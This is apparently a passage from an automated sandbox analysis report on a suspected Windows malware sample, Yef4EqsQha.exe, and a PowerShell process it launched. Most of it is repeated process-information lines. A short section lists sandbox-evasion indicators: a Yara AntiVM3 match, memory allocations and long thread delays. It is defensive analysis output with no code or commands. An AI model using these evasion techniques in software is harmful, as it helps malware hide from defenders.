                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory allocated: 1120000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory allocated: 4B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory allocated: 8E20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory allocated: 9E20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory allocated: A030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory allocated: B030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory allocated: DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 240000Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239874Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239747Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239625Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239486Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239359Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239250Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239131Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 239000Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 238869Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 238684Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599765Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 599109Jump to behavior
